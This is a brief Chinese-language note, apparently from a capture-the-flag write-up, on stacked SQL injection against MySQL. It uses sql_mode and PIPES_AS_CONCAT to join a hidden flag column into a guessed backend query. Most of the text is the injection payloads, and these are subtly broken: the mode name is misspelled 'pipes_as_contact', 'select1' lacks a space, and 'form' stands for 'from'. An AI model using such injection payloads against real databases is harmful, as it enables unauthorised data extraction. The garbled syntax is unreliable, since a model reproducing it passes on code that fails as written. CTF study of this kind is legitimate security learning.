堆疊注入
利用原理:
補充系統變量@@sql_modesql_mode:是一組mysql支持的基本語法及校驗規則
PIPES_AS_CONCAT:將“||”視為字符串的連接操作符而非或運算符,這和Oracle數據庫是一樣的,也和字符串的拼接函數Concat相類似
猜測后台sql語句為:
select 接受的變量 || flag form flag;
payload:
1;set sql_mode=pipes_as_contact;select1;
//閉合 //設置變量 //拼接sql語句
*,1
//拼接起來的sql語句是 select *,1 || flag from flag;